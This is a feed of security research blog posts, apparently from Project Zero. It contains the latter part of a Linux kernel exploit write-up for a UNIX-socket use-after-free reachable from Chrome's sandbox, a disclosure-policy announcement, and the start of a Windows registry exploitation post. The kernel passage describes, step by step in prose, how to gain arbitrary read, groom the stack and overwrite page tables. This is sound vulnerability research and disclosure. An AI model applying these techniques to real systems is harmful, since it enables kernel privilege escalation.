    Then I set up a SLUB page containing a dangling pointer, try to flush this page all the way into the buddy allocator, and reallocate it as a pipe page by using 256 pipes to each allocate 2 pages (which is the minimum size that a pipe always has, see PIPE_MIN_DEF_BUFFERS). This allocates 25624KiB = 2 MiB worth of order-0 pages.

    At this point, I have probably reallocated the SKB as a pipe page; but I don't know in which pipe the SKB is located, or at which offset. To figure that out, I store fake SKBs in the pipe pages that point to different data; then, by triggering the bug with recv(..., MSG_OOB|MSG_PEEK), I can read one byte at the pointed-to location and narrow down where in which pipe the SKB is. I don't know the addresses of any kernel objects yet; but the X86-64 implementation of copy_to_user() is symmetric and also works if you pass a userspace pointer as the source, so I can simply use userspace data pointers in the crafted SKBs for now. (SMAP is not an issue here - SMAP is disabled for all memory accesses in copy_to_user(). On x86-64, copy_to_user() is actually implemented as a wrapper around copy_user_generic(), which is a helper that accepts both kernel and userspace addresses as source and destination.)

    Afterwards, I have the ability to call copy_to_user(..., 1) on arbitrary kernel pointers through recv(..., MSG_OOB|MSG_PEEK) using the controlled SKB.

    Properties of the read primitive

    One really cool aspect of a copy_to_user()-based read primitive on x86-64 is that it doesn't crash even when called on invalid kernel pointers - if the kernel memory access fails, the recv() syscall will simply return an error (-EFAULT).

    The main limitation is that usercopy hardening (__check_object_size()) will catch attempts to read from some specific memory ranges:

    • Ranges that wrap around - not an issue here, only ranges of length 1 can be used anyway.
    • Addresses <=16 - not an issue here.
    • The kernel stack of the current process, if some other criteria are met. Not an issue here - even if I want to read from a kernel stack, I'll probably want to read the kernel stack of another thread, which isn't protected.
    • The kernel .text section - all of .data and such is accessible, just .text is restricted. When targeting a specific kernel build, that's not really relevant.
    • kmap() mappings - those don't exist on x86-64.
    • Freed vmalloc allocations, or ranges that straddle the bounds of a vmalloc allocation. Not an issue here.
    • Ranges in the direct mapping, or in the kernel image address range, that straddle the bounds of a high-order folio. Not an issue here, only ranges of length 1 can be used anyway.
    • Ranges in the direct mapping, or in the kernel image address range, that are used as SLUB pages in non-kmalloc slab caches, at offsets not allowed by usercopy allowlisting (see __check_heap_object()). This is the most annoying part.

    (There might be other ways of using this bug to read memory with different constraints, like by using the frag_iter->len read in __skb_datagram_iter() to influence an offset from which known data is subsequently read, but that seems like a pain to work with.)

    Locating the kernel image

    To break KASLR of the kernel image at this point, there are lots of options, partially thanks to copy_to_user() not crashing on access to invalid addresses; but one nice option is to read an Interrupt Descriptor Table (IDT) entry through the read-only IDT mapping at the fixed address 0xfffffe0000000000 (CPU_ENTRY_AREA_RO_IDT_VADDR), which yields the address of a kernel interrupt handler.

    Using the read primitive to observe allocator state and other things

    From here on, my goal is to use the read primitive to assist in exploiting the write primitive; I would like to be able to answer questions like:

    • What is the mapping between struct page */struct ptdesc */struct slab * and the corresponding region in the direct mapping? (This is easy and just requires reading some global variables out of the .data/.bss sections.)
    • At which address will the next sk_buff allocation be?
    • What is the current state of this particular page?
    • Where are my page tables located, and which physical address does a given virtual address map to?

    Because usercopy hardening blocks access to objects in specialized slabs, reading the contents of a struct kmem_cache is not possible, because a kmem_cache is allocated from a specialized slab type which does not allow usercopy. But there are many important pieces of kernel memory that are readable, so it is possible to work around that:

    • The kernel .data/.bss sections, which contain things like pointers to kmem_cache instances.
    • The vmemmap region, which contains all instances of struct page/struct folio/struct ptdesc/struct slab (these types all together effectively form a union) which describe the status of each page. These also contain things like a SLUB freelist head pointer; a pointer to the kmem_cache associated with a given SLUB page; or an intrusive linked list element tying together the root page tables of all processes.
    • Kernel stacks of other threads (located in vmalloc memory).
    • Per-CPU memory allocations (located in vmalloc memory), which are used in particular for memory allocation fastpaths in SLUB and the page allocator; and also the metadata describing where the per-cpu memory ranges are located.
    • Page tables.

    So to observe the state of the SLUB allocator for a given slab cache, it is possible to first read the corresponding kmem_cache* from the kernel .data/.bss section, then scan through all per-cpu memory for objects that look like a struct kmem_cache_cpu (with a struct slab * and a freelist pointer pointing into the corresponding direct mapping range), and check which kmem_cache the struct slab's kmem_cache* points to to determine whether the kmem_cache_cpu is for the right slab cache. Afterwards, the read primitive can be used to read the slab cache's per-cpu freelist head pointer out of the struct kmem_cache_cpu.

    To observe the state of a struct page/struct slab/..., the read primitive can be used to simply read the page's refcount and mapcount (which contains type information). This makes it possible to observe things like "has this page been freed yet or is it still allocated" and "as what type of page has this page been reallocated".

    To locate the page table root of the current process, it is similarly not possible to directly go through the mm_struct because that is allocated from a specialized slab type which does not allow usercopy (except in the saved_auxv field). But one way to work around this is to instead walk the global linked list of all root page tables (pgd_list), which stores its elements inside struct ptdesc, and search for a struct ptdesc which has a pt_mm field that points to the mm_struct of the current process. The address of this mm_struct can be obtained from the per-cpu variable cpu_tlbstate.loaded_mm. Afterwards, the page tables can be walked through the read primitive.

    Finding a reallocation target: The magic of CONFIG_RANDOMIZE_KSTACK_OFFSET

    Having already discarded the "bump a pointer by 4 GiB" and "reallocate as a maple tree node" strategies, I went looking for some other allocation which would place an object such that incrementing the value at address 0x...44 leads to a nice primitive. It would be nice to have something there like an important flags field, or a length specifying the size of a pointer array, or something like that. I spent a lot of time looking at various object types that can be allocated on the kernel heap from inside the Chrome sandbox, but found nothing great.

    Eventually, I realized that I had been going down the wrong path. Clearly trying to target a heap object was foolish, because there is something much better: It is possible to reallocate the target page as the topmost page of a kernel stack!

    That might initially sound like a silly idea; but Debian's kernel config enables CONFIG_RANDOMIZE_KSTACK_OFFSET=y and CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT=y, causing each syscall invocation to randomly shift the stack pointer down by up to 0x3f0 bytes, with 0x10 bytes granularity. That is supposed to be a security mitigation, but works to my advantage when I already have an arbitrary read: instead of having to find an overwrite target that is at a 0x44-byte distance from the preceding 0x100-byte boundary, I effectively just have to find an overwrite target that is at a 0x4-byte distance from the preceding 0x10-byte boundary, and then keep doing syscalls and checking at what stack depth they execute until I randomly get lucky and the stack lands in the right position.

    With that in mind, I went looking for an overwrite target on the stack, strongly inspired by Seth's exploit that overwrote a spilled register containing a length used in copy_from_user. Targeting a normal copy_from_user() directly wouldn't work here - if I incremented the 64-bit length used inside copy_from_user() by 4 GiB, then even if the copy failed midway through due to a userspace fault, copy_from_user() would try to memset() the remaining kernel memory to zero.

    I discovered that, on the codepath pipe_write -> copy_page_from_iter -> copy_from_iter, the 64-bit length variable bytes of copy_page_from_iter() is stored in register R14, which is spilled to the stack frame of copy_from_iter(); and this stack spill is in a stack location where I can clobber it.

    When userspace calls write() on a pipe, the kernel constructs an iterator (struct iov_iter) that encapsulates the userspace memory range passed to write(). (There are different types of iterators that can encapsulate a single userspace range, a set of userspace ranges, or various types of kernel memory.) Then, pipe_write() (which is called anon_pipe_write() in newer kernels) essentially runs a loop which allocates a new pipe_buffer slot in the pipe, places a new page allocation in this pipe buffer slot, and copies up to a page worth of data (PAGE_SIZE bytes) from the iov_iter to the pipe buffer slot's page using copy_page_from_iter(). copy_page_from_iter() effectively receives two length values: The number of bytes that fit into the caller-provided page (bytes, initially set to PAGE_SIZE here) and the number of bytes available in the struct iov_iter encapsulating the userspace memory range (i->count). The amount of data that will actually be copied is limited by both.

    If I manage to increment the spilled register R14 which contains bytes by 4 GiB while copy_from_iter() is busy copying data into the kernel, then after copy_from_iter() returns, copy_page_from_iter() will effectively no longer be bounded by bytes, only by i->count (based on the length userspace passed to write()); so it will do a second iteration, which copies into out-of-bounds memory behind the pipe buffer page. If userspace calls write(fd, buf, 0x3000), and the overwrite happens in the middle of copying bytes 0x1000-0x1fff of the userspace buffer into the second pipe buffer page, then bytes 0x2000-0x2fff will be written out-of-bounds behind the second pipe buffer page, at which point i->count will drop to 0, terminating the operation.

    Reallocating a SLUB page as a stack page, with arb-read assistance

    So to get the ability to increment-after-free a value in a stack page, I again start by draining the low-order page allocator caches. But this time, the arb-read can be used to determine when an object at the right in-page offset is at the top of the SLUB freelist for the sk_buff slub cache; and the arb-read can also determine whether I managed to allocate an entire slab page worth of objects, with no other objects mixed in. Then, when flushing the page out of the SLUB allocator, the arb-read helps to verify that the page really has been freed (its refcount field should drop to 0); and afterwards, the page is flushed out of the page allocator's per-cpu freelist.

    Then, to reallocate the page, I run a loop that first allocates a pipe page, then checks the refcount field of the target page. If the refcount of the target page goes up, I probably found the target page, and can exit the loop; otherwise, I free the pipe page again, reallocate it as a page table to drain the page away, and try again. (Directly allocating as a page table would be cumbersome because page tables have RCU lifetime, so once a page has been allocated as a page table, it is hard to reallocate it. Keeping drained pages in pipe buffers might not work well due to the low file descriptor table size, and each pipe FD pair potentially only being able to reference two pages.)

    Once I have reallocated the target page as a pipe buffer, I free it again, then free three more pages (from other helper pipes), and then create a new thread with the clone() syscall. If everything goes well, clone() will allocate four pages for the new kernel stack: First the three other pages I freed last, and then the target page as the last page of the stack. By walking the page tables, I can verify that the target page really got reused as the last page of the target stack.

    Remaining prerequisites for using the write primitive

    At this point, I have the write primitive set up such that I can trigger it on a specific stack memory location. The write primitive essentially first reads some surrounding (stack) memory (in unix_stream_read_actor() and its callees skb_copy_datagram_msg -> skb_copy_datagram_iter) and expects that memory to have a certain structure before incrementing the value at a specific stack location.

    I also know what stack allocation I want to overwrite.

    The remaining issues are:

    1. I need to ensure that an OOB copy_from_user() behind a pipe buffer page will overwrite some data that helps in compromising the kernel.
    2. I need to be able to detect at what stack depth pipe_write() is running, and depending on that either try again or proceed to trigger the bug.
    3. The UAF reads preceding the UAF increment need to see the right kind of data to avoid crashing.
    4. copy_from_iter() needs to take enough time to allow me to increment a value in its stack frame.

    Selecting an OOB overwrite target

    Page tables have several nice properties here:

    • It is easy for me to cause allocation of as many page tables as I want.
    • I can easily determine the physical and kernel-virtual addresses of page tables that the kernel has allocated for my process (by walking the page tables with the arb read).
    • They are order-0 unmovable allocations, just like pipe buffers, so the page allocator will allocate them in the same 2MiB pageblocks.

    So I am choosing to use the OOB copy_from_user() to overwrite a page table.

    This requires that I can observe where my pipe buffer pages are located; for that, I again use the SLUB per-cpu freelist observing trick, this time on the kmalloc-cg-192 slab cache, to figure out where a newly created pipe's pipe_inode_info is located. From there, I can walk to the pipe's pipe_buffer array, which contains pointers to the pages used by the pipe.

    With the ability to observe both where my page tables are located and where pipe buffer pages are allocated, I can essentially alternatingly allocate page tables and pipe buffer pages until I get two that are adjacent.

    Detecting pipe_write() stack depth

    To run pipe_write() with a write() syscall such that I can reliably determine at which depth the function is running and decide whether to go ahead with the corruption, without having to race, I can prepare a pipe such that it initially only has space for one more pipe_buffer, and then call write() with a length of 0x3000. This will cause pipe_write() to first store 0x1000 bytes in the last free pipe_buffer slot, then wait for space to become available again. From another thread, it is possible to detect when pipe_write() has used the last free pipe_buffer slot by repeatedly calling poll() on the pipe: When poll() stops reporting that the pipe is ready for writing (POLLOUT), pipe_write() must have used up the last free pipe_buffer slot.

    At that point, I know that the syscall entry part of the kernel stack is no longer changing. To check whether the syscall is executing at a specific depth, it is enough to check whether the return address for the return from x64_sys_call to do_syscall_64 is at the expected position on the kernel stack using the arb read - it can't be a return address left from a preceding syscall because the same stack location where that return address is stored is always clobbered by a subsequent call to syscall_exit_to_user_mode at the end of a syscall.

    If the stack randomization is the correct one, I can then do more setup and resume pipe_write() by using read() to clear pipe buffer entries; otherwise, I will use read() to clear pipe buffer entries, let pipe_write() run to completion, and try again.

    Letting the reads in the increment primitive see the right data

    The increment primitive happens on this call graph:

    unix_stream_recv_urg

      [read dangling pointer from ->oob_skb]

      unix_stream_read_actor [called as state->recv_actor]

        [UAF read UNIXCB(skb).consumed]

        skb_copy_datagram_msg

          skb_copy_datagram_iter

            __skb_datagram_iter

              skb_headlen

                [UAF read skb->len]

                [UAF read skb->data_len]

              skb_frags_readable

                [UAF read skb->unreadable]

              skb_shinfo [for reading nr_frags]

                skb_end_pointer

                  [UAF read skb->head]

                  [UAF read skb->end]

              skb_walk_frags

                skb_shinfo [for reading frag_list]

                [forward iteration starting at skb_shinfo(skb)->frag_list along ->next pointers]

      [UAF increment of UNIXCB(oob_skb).consumed]


    A promising aspect here is that this codepath first does all the reads; then it does a linked list walk through attacker-controlled pointers with skb_walk_frags(); and then it does the write. skb_walk_frags() is defined as follows:

    #define skb_walk_frags(skb, iter)   \

        for (iter = skb_shinfo(skb)->frag_list; iter; iter = iter->next)


    and is used like this in __skb_datagram_iter():

        skb_walk_frags(skb, frag_iter) {

            int end;

            WARN_ON(start > offset + len);

            end = start + frag_iter->len;

            if ((copy = end - offset) > 0) {

                if (copy > len)

                    copy = len;

                if (__skb_datagram_iter(frag_iter, offset - start,

                            to, copy, fault_short, cb, data))

                    goto fault;

                if ((len -= copy) == 0)

                    return 0;

                offset += copy;

            }

            start = end;

        }


    So if I run recv(..., MSG_OOB) on the UNIX domain socket while the dangling ->oob_skb pointer points to data I control, and craft that fake SKB such that its skb_shinfo(skb)->frag_list points to another fake SKB with ->len=0 and a ->next pointer pointing back to itself, I can cause the syscall to get stuck in an infinite loop. It will keep looping until I replace the ->next pointer with NULL, at which point it will perform just the UAF increment.

    This is great news: instead of needing to ensure that the stack contains the right data for the UAF reads and the overwrite target for the UAF increment at the same time, I can first place controlled data on the stack, and then afterwards separately place the overwrite target on the stack.

    To place controlled data on the stack, I initially considered using select() or poll(), since I know that those syscalls copy large-ish amounts of data from userspace onto the stack; however, those have the disadvantage of immediately validating the supplied data, and it would be hard to make them actually stay in the syscall, rather than immediately returning out of the syscall with an error and often clobbering the on-stack data array in the process. Eventually I discovered that sendmsg() on a datagram-oriented UNIX domain socket works great for this: ___sys_sendmsg(), which implements the sendmsg() syscall, will import the destination address pointed to by msg->msg_name into a stack buffer (struct sockaddr_storage address), then call into the protocol-specific ->sendmsg handler - in the case of datagram-oriented UNIX domain sockets, unix_dgram_sendmsg(). This function coarsely validates the structure of the destination address (checking that it specifies the AF_UNIX family and is no larger than struct sockaddr_un), then waits for space to become available in the socket's queue before doing anything else with the destination address. This makes it possible to place 108 bytes of controlled data on a kernel stack, and that data will stay there until the syscall can continue or bail out when space becomes available in the socket queue or the socket is shut down. I actually need a bit more data on the stack, but luckily the struct iovec iovstack[UIO_FASTIOV] is directly in front of the address, and unused elements at the end of the iovstack are guaranteed to be zeroed thanks to CONFIG_INIT_STACK_ALL_ZERO=y, which happens to be exactly what I need.

    It would be helpful to be able to reliably wait for the sendmsg() syscall to enter the kernel and copy the destination address onto the kernel stack before inspecting the state of its stack; this is luckily possible by supplying a single-byte "control message" via msg->msg_control and msg->msg_controllen, which will mostly be ignored because it is too small to be a legitimate control message, but will be copied onto the kernel stack in ____sys_sendmsg() after the destination address has been copied onto the stack. It is possible to detect from userspace when this kernel access to msg->msg_control happens by pointing it to a userspace address which is not yet populated with a page table entry, then polling mincore() on this userspace address.

    So now my strategy is roughly:

    1. In a loop, call sendmsg() on the thread with the stack the dangling ->oob_skb pointer points to to place a fake SKB on the stack until the fake SKB lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET, and have that fake SKB's skb_shinfo(skb)->frag_list point to a second fake SKB with a ->next pointer that refers back to itself. (This second fake SKB can be placed anywhere I want, so I'm putting it in a userspace-owned page, so that userspace can directly write into it.)
    2. On a second thread, use write() on a UNIX domain socket to use the dangling ->oob_skb pointer, which will start looping endlessly, following the ->next pointer.
    3. On the thread that called sendmsg() before, now call write(..., 0x3000) on a pipe with one free pipe_buffer slot in a loop until the syscall handler lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET.
    4. Let the pipe write() continue, and wait until it is in the middle of copying data from userspace memory to a pipe buffer page.
    5. Set the ->next pointer in the second fake SKB to NULL, so that the write() on the UNIX domain socket stops looping, performs the UAF increment, and returns.
    6. Wait for the pipe write() to finish, at which point the page table behind the pipe data page should have been overwritten with controlled data.

    Slowing down copy_from_iter()

    I need to slow down a copy_from_iter() call. There are several strategies for this that don't work (or don't work well) in a Chrome renderer sandbox:

    • userfaultfd: not accessible in the Chrome Desktop renderer sandbox, and nowadays usually anyways nerfed such that only root can use it to intercept usercopy operations
    • FUSE: not accessible in the Chrome Desktop renderer sandbox
    • causing lots of major page faults: I'm not sure if there is some indirect way to get a file descriptor to a writable on-disk file; but either way, this seems like it would be a pain from a renderer.

    But as long as only a single userspace memory read needs to be delayed, there is another option: I can create a very large anonymous VMA; fill it with mappings of the 4KiB zeropage; ensure that no page is mapped at one specific location in the VMA (for example with madvise(..., MADV_DONTNEED), which zaps page table entries in the specified range); and then have one thread run an mprotect() operation on this large anonymous VMA while another thread tries to access the part of the userspace region where no page is currently mapped. The mprotect() operation will keep the VMA write-locked while it walks through all the associated page table entries, modifies the page table entries as required, and performs TLB flushes if necessary; so a concurrent page fault in this VMA will have to wait until the mprotect() has finished. One limitation of this technique is that the part of the accessed userspace range that causes the slowdown will be filled with zeroes; but that can just be a single byte at the start or end of the range being copied, so it's not a major limitation.

    Based on some rough testing on my machine, if mprotect() has to iterate through 128 MiB of page tables populated with zeropage mappings, it takes something like 500-1000ms depending on which way the page table entries are changed.

    Page table control

    Putting all this together, I can overwrite the contents of a page table with controlled data. I'm using that controlled write to place a new entry in the page table that points back to the page table, effectively creating a userspace mapping of the page table; and then I can use this to map arbitrary kernel memory writably into userspace.

    My exploit demonstrates its ability to modify kernel memory with this by using it to overwrite the UTS information printed by uname.

    Takeaway: Chrome sandbox attack surface

    One thing that stood out to me about this is that I was able to use a somewhat large number of kernel interfaces in this exploit; in particular:

    interface

    usecase

    anonymous VMA creation

    page table allocations

    madvise()

    fast VMA splitting and merging

    AF_UNIX SOCK_STREAM sockets

    triggering the bug; SKB allocation and freeing

    sched_getcpu() (via syscall-less fastpaths)

    interacting with per-cpu kernel structures

    eventfd()

    synchronization between threads

    pipe()

    allocation and freeing of order-0 unmovable pages with controlled contents

    pipe()

    stack overwrite target

    AF_UNIX SOCK_DGRAM sockets

    placing controlled data on the stack

    sendmsg()

    placing controlled data on the stack

    mprotect()

    slowing down copy_from_user()

    munmap()

    TLB flushing

    madvise(..., MADV_DONTNEED)

    zapping PTEs for slowing down subsequent copy_from_user() or subsequently detecting copy_from_user()

    mincore()

    detecting copy_from_user()

    clone()

    racing operations on multiple threads; reallocating pages as kernel stack

    poll()

    detecting progress of concurrent pipe_write()

    Some of these are obviously needed to implement necessary features of the sandboxed renderer; others seem like unnecessary attack surface. I hope to look at this more systematically in the future.

    Takeaway: Esoteric kernel features in core interfaces are an issue for browser sandboxes

    One thing I've noticed, not just with this issue, but several issues before that, is that core kernel subsystems (which are exposed in renderer sandbox policies and such) sometimes have flags that trigger esoteric ancillary features that are unintentionally exposed by Chrome's renderer sandbox. Such features seem to often be more buggy than the core feature that the policy intended to expose. Examples of this from Chrome's past include:

    • futex() was broadly exposed in the sandbox, making it possible to reach a bug in Priority Inheritance futexes from the renderer sandbox.
    • memfd_create() was exposed in the sandbox without checking its flags, making it possible to create HugeTLB mappings using the MFD_HUGETLB flag. There have been several bugs in HugeTLB, which is to my knowledge almost exclusively used by some server applications that use large amounts of RAM, such as databases.
    • pipe2() was exposed in the sandbox without checking its flags, making it possible to create "notification pipes" using the O_NOTIFICATION_PIPE flag, which behave very differently from normal pipes and are used exclusively for posting notifications from the kernel "keys" subsystem to userspace.

    Takeaway: probabilistic mitigations against attackers with arbitrary read

    When faced with an attacker who already has an arbitrary read primitive, probabilistic mitigations that randomize something differently on every operation can be ineffective if the attacker can keep retrying until the arbitrary read confirms that the randomization picked a suitable value or even work to the attacker's advantage by lining up memory locations that could otherwise never overlap, as done here using the kernel stack randomization feature.

    Picking per-syscall random stack offsets at boottime might avoid this issue, since to retry with different offsets, the attacker would have to wait for the machine to reboot or try again on another machine. However, that would break the protection for cases where the attacker wants to line up two syscalls that use the same syscall number (such as different ioctl() calls); and it could also weaken the protection in cases where the attacker just needs to know what the randomization offset for some syscall will be.

    Somewhat relatedly, Blindside demonstrated that this style of attack can be pulled off without a normal arbitrary read primitive, by “exploiting” a real kernel memory corruption bug during speculative execution in order to leak information needed for subsequently exploiting the same memory corruption bug for real.

    Takeaway: syzkaller fuzzing and complex data structures

    The first memory corruption bug described in this post was introduced in late June 2024, and discovered by syzkaller in late August 2024. Hitting that bug required 6 syscalls: One to set up a socket pair, four send()/recv() calls to set up a dangling pointer, and one more recv() call to actually trigger UAF by accessing the dangling pointer.

    Hitting the second memory corruption bug, which I found by code review, required 8 syscalls: One to set up a socket pair, six send()/recv() calls to set up a dangling pointer, and one more recv() to cause UAF.

    This was not a racy bug; in a KASAN build, running the buggy syscall sequence once would be enough to get a kernel splat. But when a fuzzer chains together syscalls more or less at random, the chance of running the right sequence of syscalls drops exponentially with each syscall required...

    The most important takeaway from this is that data structures with complex safety rules (in this case, rules about the ordering of different types of SKBs in the receive queues of UNIX domain stream sockets) don't just make it hard for human programmers to keep track of safety rules, they also make it hard for fuzzers to construct inputs that explore all relevant state patterns. This might be an area for fuzzer improvement - perhaps fuzzers could reach deeper into specific subsystems by generating samples that focus on interaction with a single kernel subsystem, or by monitoring whether additional syscalls chained to the end of a base sample cause additional activity in a particular subsystem.

    Takeaway: copy_from_user() delays don't require FUSE or userfaultfd

    FUSE and userfaultfd are the most effective and reliable ways to inject delays on copy_from_user() calls because they can set up separate delays for multiple memory regions, provide precise control over the timing of the injected delay, don't require large allocations or slow preparation, and allow placing arbitrary data in the page that is eventually installed. However, applying mprotect() to a large anonymous VMA filled with zeropage mappings (with 128 MiB of page tables) turns out to be sufficient to delay kernel execution by around a second. In the past, I have pushed for restricting userfaultfd because of how it can delay operations like copy_from_user(), but perhaps userfaultfd was not actually significantly more useful in this regard than mprotect().

    Takeaway: Usercopy hardening

    The hardening checks I encountered when calling copy_to_user() on arbitrary kernel addresses were a major annoyance, but could be worked around, since access to almost anything except type-specific SLUB pages is allowed. That said, I'm not sure how important improving these checks is - trying to protect against an attacker who can pass arbitrary kernel pointers to copy_to_user() might be futile, and guarding against out-of-bounds/use-after-free copy_to_user() or such is the major focus of this hardening.

    Conclusions

    Even in somewhat constrained environments, it is possible to pull off moderately complex Linux kernel exploits.

    Chrome's Linux desktop renderer sandbox exposes kernel attack surface that is never legitimately used in the sandbox. This needless functionality doesn’t just allow attackers to exercise vulnerabilities they otherwise couldn’t; it also exposes kernel interfaces that are useful for exploitation, enabling heap grooming, delay injection and more. The Linux kernel contributes to this issue by exposing esoteric features through the same syscalls as commonly-used core kernel functionality. I hope to do a more in-depth analysis of Chrome's renderer sandbox on Linux in a follow-up blogpost.

    • ✇Project Zero
    • Policy and Disclosure: 2025 Edition Google Project Zero
      Posted by Tim Willis, Google Project Zero In 2021, we updated our vulnerability disclosure policy to the current "90+30" model. Our goals were to drive faster yet thorough patch development, and improve patch adoption. While we’ve seen progress, a significant challenge remains: the time it takes for a fix to actually reach an end-user's device.This delay, often called the "patch gap," is a complex problem. Many consider the patch gap to be the time between a fix being released for a security vul
       

    Policy and Disclosure: 2025 Edition

    29 de Julho de 2025, 11:54

    Posted by Tim Willis, Google Project Zero

    In 2021, we updated our vulnerability disclosure policy to the current "90+30" model. Our goals were to drive faster yet thorough patch development, and improve patch adoption. While we’ve seen progress, a significant challenge remains: the time it takes for a fix to actually reach an end-user's device.

    This delay, often called the "patch gap," is a complex problem. Many consider the patch gap to be the time between a fix being released for a security vulnerability and the user installing the relevant update. However, our work has highlighted a critical, earlier delay: the "upstream patch gap". This is the period where an upstream vendor has a fix available, but downstream dependents, who are ultimately responsible for shipping fixes to users, haven’t yet integrated it into their end product.

    As Project Zero's recent work has focused on foundational, upstream technologies like chipsets and their drivers, we've observed that this upstream gap significantly extends the vulnerability lifecycle.

    For the end user, a vulnerability isn't fixed when a patch is released from Vendor A to Vendor B; it's only fixed when they download the update and install it on their device. To shorten that entire chain, we need to address the upstream delay.

    To address this, we're announcing a new trial policy: Reporting Transparency.

    The Trial: Reporting Transparency

    Our core 90-day disclosure deadline will remain in effect. However, we're adding a new step at the beginning of the process.

    Beginning today, within approximately one week of reporting a vulnerability to a vendor, we will publicly share that a vulnerability was discovered. We will share:

    • The vendor or open-source project that received the report.
    • The affected product.
    • The date the report was filed, and when the 90-day disclosure deadline expires.

    This trial maintains our existing 90+30 policy, meaning vendors still have 90 days to fix a bug before it is disclosed, with a 30-day period for patch adoption if the bug is fixed before the deadline.

    Google Big Sleep, a collaboration between Google DeepMind and Google Project Zero, will also be trialling this policy for their vulnerability reports. The issue tracker for Google Big Sleep is at goo.gle/bigsleep

    Why the Change? Increased Transparency to Close the Gap

    The primary goal of this trial is to shrink the upstream patch gap by increasing transparency. By providing an early signal that a vulnerability has been reported upstream, we can better inform downstream dependents. For our small set of issues, they will have an additional source of information to monitor for issues that may affect their users. 

    We hope that this trial will encourage the creation of stronger communication channels between upstream vendors and downstream dependents relating to security, leading to faster patches and improved patch adoption for end users.

    This data will make it easier for researchers and the public to track how long it takes for a fix to travel from the initial report, all the way to a user's device (which is especially important if the fix never arrives!)

    Will this help attackers?

    No — we anticipate that in the initial phase of this trial, there may be increased public attention on unfixed bugs. We want to be clear: no technical details, proof-of-concept code, or information that we believe would materially assist discovery will be released until the deadline. Reporting Transparency is an alert, not a blueprint for attackers.

    We understand that for some vendors without a downstream ecosystem, this policy may create unwelcome noise and attention for vulnerabilities that only they can address. However, these vendors now represent the minority of vulnerabilities reported by Project Zero. We believe the benefits of a fair, simple, consistent and transparent policy outweigh the risk of inconvenience to a small number of vendors.

    That said, in 2025, we hope that the industry consensus is that the mere existence of vulnerabilities in software is neither surprising nor alarming. End users are more aware of the importance of security updates than ever before. It's widely accepted as fact that any system of moderate complexity will have vulnerabilities, and systems that were considered impenetrable in the past have been shown to be vulnerable in retrospect.

    This is a trial, and we will be closely monitoring its effects. We hope it achieves our ultimate goal: a safer ecosystem where vulnerabilities are remediated not just in an upstream code repository, but on the devices, systems and services that people use every day. We look forward to sharing our findings and continuing to evolve our policies to meet the challenges of the ever-changing security landscape.

    • ✇Project Zero
    • The Windows Registry Adventure #8: Practical exploitation of hive memory corruption Google Project Zero
      Posted by Mateusz Jurczyk, Google Project Zero In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques descri
       

    The Windows Registry Adventure #8: Practical exploitation of hive memory corruption

    28 de Maio de 2025, 15:09

    Posted by Mateusz Jurczyk, Google Project Zero

    In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail.

    Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows):

    A diagram showing a corrupted memory cell overflowing an adjacent cell

    and temporal violations, such as use-after-free conditions:

    A diagram showing multiple invalid references to a freed cell

    In this write up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 with a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.

    Where to start: high-level overview of potential options

    Let's start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn't pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation.

    The exploitation of classic memory corruption bugs typically involves the following steps:

    1. Initial memory corruption primitive
    2. ???
    3. ???
    4. ???
    5. Profit (in the form of arbitrary code execution, privilege escalation, etc.)

    The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance:

    A flowchart depicting exploit development strategy, starting with "Memory corruption" which leads to "Information leak". This is followed by "Arbitrary vtable call", then "ROP" (Return-Oriented Programming). "ROP" leads to "Allocation of executable payload", which ultimately results in "Arbitrary code execution".

    In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation:

    A diagram showing a box labeled "Hive memory corruption" with an arrow pointing to a second box with a dashed outline and a question mark inside, indicating an unknown next step resulting from hive memory corruption.

